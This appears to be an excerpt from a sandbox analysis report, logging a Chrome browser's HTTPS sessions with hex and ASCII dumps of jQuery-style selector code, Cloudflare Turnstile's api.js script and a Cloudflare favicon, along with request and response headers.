                                                                                                                                                                                                                            Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                                                                                                                            Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                                                                                                                            Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            13192.168.2.649748104.18.95.414436820C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC383OUTGET /turnstile/v0/g/8a57887573f2/api.js HTTP/1.1
                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2025-02-11 15:27:14 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 11 Feb 2025 15:27:13 GMT
                                                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 48130
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                                            last-modified: Tue, 04 Feb 2025 13:03:14 GMT
                                                                                                                                                                                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 91055ca05b878c45-EWR
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            2025-02-11 15:27:14 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                            Data Ascii: "use strict";(function(){function Ht(e,t,a,o,c,l,g){try{var h=e[l](g),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
                                                                                                                                                                                                                            2025-02-11 15:27:14 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 74 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75
                                                                                                                                                                                                                            Data Ascii: e}function Sr(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=nu
                                                                                                                                                                                                                            2025-02-11 15:27:14 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 71 74 28 65 29 7c 7c 7a 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 56 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                                                                                                                                                            Data Ascii: ray$/.test(a))return ot(e,t)}}function Se(e,t){return qt(e)||zt(e,t)||Xt(e,t)||Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ve(e,t){var a={label:0,sent:function(){if(l[0
                                                                                                                                                                                                                            2025-02-11 15:27:14 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                                                                                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var Pe=300030;var We=300031;var j;(fu
                                                                                                                                                                                                                            2025-02-11 15:27:14 UTC1369INData Raw: 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 65 65 7c 7c 28 65 65 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76 61 72 20 6d 65 3b
                                                                                                                                                                                                                            Data Ascii: R="never",e.MANUAL="manual",e.AUTO="auto"})(ee||(ee={}));var ce;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ce||(ce={}));var Q;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(Q||(Q={}));var me;
                                                                                                                                                                                                                            2025-02-11 15:27:14 UTC1369INData Raw: 22 73 74 72 69 6e 67 22 26 26 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 4c 2e 4e 4f 52 4d 41 4c 2c 4c 2e 43 4f 4d 50 41 43 54 2c 4c 2e 49 4e 56 49 53 49 42 4c 45 2c 4c 2e 46 4c 45 58 49 42 4c 45 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 6b 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75
                                                                                                                                                                                                                            Data Ascii: "string"&&Nr.test(e)}function pt(e){return M([L.NORMAL,L.COMPACT,L.INVISIBLE,L.FLEXIBLE],e)}function vt(e){return M(["auto","manual","never"],e)}function mt(e){return M(["auto","manual","never"],e)}var kr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e){retu
                                                                                                                                                                                                                            2025-02-11 15:27:14 UTC1369INData Raw: 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 67 2c 68 29 7b 76 61 72 20 73 3d 54 74 28 61 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 5f 3d 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 68 29 3a 22 22 2c 49 3d 61 5b 22 66 65 65 64 62 61 63 6b 2d 65 6e 61 62 6c 65 64 22 5d 3d 3d 3d 21 31 3f 22 66 62 44 22 3a 22 66 62 45 22 3b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 73 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 70 2c 22 74 75 72 6e 73 74 69 6c 65 2f 69 66 2f 6f 76
                                                                                                                                                                                                                            Data Ascii: o=e["base-url"])!==null&&o!==void 0?o:a}return a}function Rt(e,t,a,o,c,l,g,h){var s=Tt(a,c),p=l?"h/".concat(l,"/"):"",_=h?"?".concat(h):"",I=a["feedback-enabled"]===!1?"fbD":"fbE";return"".concat(s,"/cdn-cgi/challenge-platform/").concat(p,"turnstile/if/ov
                                                                                                                                                                                                                            2025-02-11 15:27:14 UTC1369INData Raw: 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 74 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 29 7b 69 66 28 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 3d 3d 22 75 6e 64 65 66 69 6e 65
                                                                                                                                                                                                                            Data Ascii: if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,writable:!0,configurable:!0}}),t&&te(e,t)}function ze(){if(typeof Reflect=="undefine
                                                                                                                                                                                                                            2025-02-11 15:27:14 UTC1369INData Raw: 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 71 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 7a 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 6c 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 73 72 28 74 68 69 73 2c 63 29 7d 7d 76 61 72 20 66 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 75 72 28 61 2c 65 29 3b 76 61 72 20 74 3d 64 72 28 61 29 3b
                                                                                                                                                                                                                            Data Ascii: eof t=="function")?t:qe(e)}function dr(e){var t=ze();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Reflect.construct(o,arguments,l)}else c=o.apply(this,arguments);return sr(this,c)}}var fr=function(e){"use strict";ur(a,e);var t=dr(a);
                                                                                                                                                                                                                            2025-02-11 15:27:14 UTC1369INData Raw: 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 6c 3d 74 2e 70 61 72 61 6d 73 2e 74 68 65 6d 65 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 29 3b 74 2e 77 72 61 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 6d 28 22 43 61 6e 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 20 57 69 64 67 65 74 2c 20 45 6c 65 6d 65 6e 74 20 6e 6f 74 20 66 6f 75 6e 64 20 28 23 22 2e 63 6f 6e 63 61 74 28
                                                                                                                                                                                                                            Data Ascii: -cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((l=t.params.theme)!==null&&l!==void 0?l:t.theme,"/").concat(a);t.wrapper.parentNode||m("Cannot initialize Widget, Element not found (#".concat(


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            14192.168.2.649749104.16.5.1894436820C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC598OUTGET /favicon.png HTTP/1.1
                                                                                                                                                                                                                            Host: developers.cloudflare.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                            Referer: https://8l.dichotomou8.com/
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2025-02-11 15:27:14 UTC697INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 11 Feb 2025 15:27:14 GMT
                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                            Content-Length: 937
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                            ETag: "6be7ff94b6151f8cfbf08b53a17e2ac1"
                                                                                                                                                                                                                            Set-Cookie: __cf_bm=1jF8wpEM2E_ivoh.EQrBozsaGXiAJpog1IOGTMqA3iU-1739287634-1.0.1.1-F_nJF1_3gxGpWwkjwcFmgquLuoTMou2soOs3U.ahD0JoEnibhlwY8N3rv0atQaKsR2JQFNCvU2gus4Jnv1JO1w; path=/; expires=Tue, 11-Feb-25 15:57:14 GMT; domain=.developers.cloudflare.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 91055ca0ee4543a4-EWR
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            2025-02-11 15:27:14 UTC672INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 5b 49 44 41 54 58 c3 ed 96 4b 48 54 51 18 c7 67 e6 86 91 04 d1 26 e8 a1 d7 c9 02 21 70 59 2d d4 71 d4 96 2d 42 93 48 82 08 a3 16 51 60 48 59 99 77 4c a7 4c ed b1 0d 8a da 44 a4 e6 a3 b2 a8 a8 4d bb 68 53 8b 48 a2 77 b4 c9 8d 77 46 e7 de 79 7c fd bf 73 cf 9d 39 8e 8f 32 85 36 73 e0 c7 77 e7 dc c7 ff ff 7d df 39 f7 8e c7 93 1b b9 b1 c0 11 6d f7 7b 22 a1 22 71 cc 51 85 c7 78 f3 5a 4f a4 bd 68 e9 85 55 11 79 ec 33 0d 5d 03 5e b3 4d f7 20 fa 30 a7 01 ef 44 37 4c 1a 99 eb 97 44 dc cc 88 b3 b0 77 de eb 0d 61 24 7d 2f 75 fa 17 29 6e e8 ee b1 a6 cc 07 40 17 18 04 a3 e0 06 38 08 56 f3 79 36 a9 9a
                                                                                                                                                                                                                            Data Ascii: PNGIHDR szzpHYs~[IDATXKHTQg&!pY-q-BHQ`HYwLLDMhSHwwFy|s926sw}9m{""qQxZOhUy3]^M 0D7LDwa$}/u)n@8Vy6
                                                                                                                                                                                                                            2025-02-11 15:27:14 UTC265INData Raw: a0 09 1c 01 87 e4 9b b0 01 bd 5f 93 b5 e8 ca 40 13 68 01 2f 84 89 fb c2 c4 2e 16 2f 55 32 4e 64 f5 92 e4 8b e6 07 f8 2e f9 a6 f0 55 f2 05 7c 06 9f c0 7b d0 28 16 da cd ad 79 10 09 81 d7 60 0c 7c 04 e3 dc 02 7a 5c cd 06 7a d9 40 0b 6f 35 18 88 e1 2d 98 94 0b 4f f4 54 c6 54 4c 29 af 35 17 1d ce 79 b1 6d 0d 9d ab 96 0f 81 01 7a 5a e3 94 7f d8 81 b3 c7 bc c5 8b 12 f1 3a 1b b8 42 97 8a 69 0a e5 8e 77 ce 82 d2 eb 3f 21 0c f0 f6 6d 2d 78 69 f5 95 1f a6 e7 3b 9c 9e 0f 65 0c 30 c9 41 cc e1 1c 57 c7 7d bf ef 45 a6 b5 88 75 ff 0a ee e7 c8 cf 68 30 4f ad 2f c5 de df 82 55 df 00 6a 41 1d c4 ea 2c 20 a2 f3 7b 0f 28 fc ff 7f b1 f8 dd cf 5f 3d fe 77 23 bf 7e 8b c6 3c bd c1 67 0f 56 7a 91 a9 c6 c8 6f 40 1a 65 ce 9b fb 93 9b 1b b9 91 1b bf 01 83 32 f8 e3 ed 08 de 54 00 00
                                                                                                                                                                                                                            Data Ascii: _@h/./U2Nd.U|{(y`|z\z@o5-OTTL)5ymzZ:Biw?!m-xi;e0AW}Euh0O/UjA, {(_=w#~<gVzo@e2T


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            15192.168.2.649750104.16.2.1894436820C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-02-11 15:27:14 UTC527OUTGET /favicon.png HTTP/1.1
                                                                                                                                                                                                                            Host: developers.cloudflare.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            Cookie: __cf_bm=1jF8wpEM2E_ivoh.EQrBozsaGXiAJpog1IOGTMqA3iU-1739287634-1.0.1.1-F_nJF1_3gxGpWwkjwcFmgquLuoTMou2soOs3U.ahD0JoEnibhlwY8N3rv0atQaKsR2JQFNCvU2gus4Jnv1JO1w
                                                                                                                                                                                                                            2025-02-11 15:27:15 UTC413INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 11 Feb 2025 15:27:14 GMT
                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                            Content-Length: 937
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                            ETag: "6be7ff94b6151f8cfbf08b53a17e2ac1"
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 91055ca61b6b43ef-EWR
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
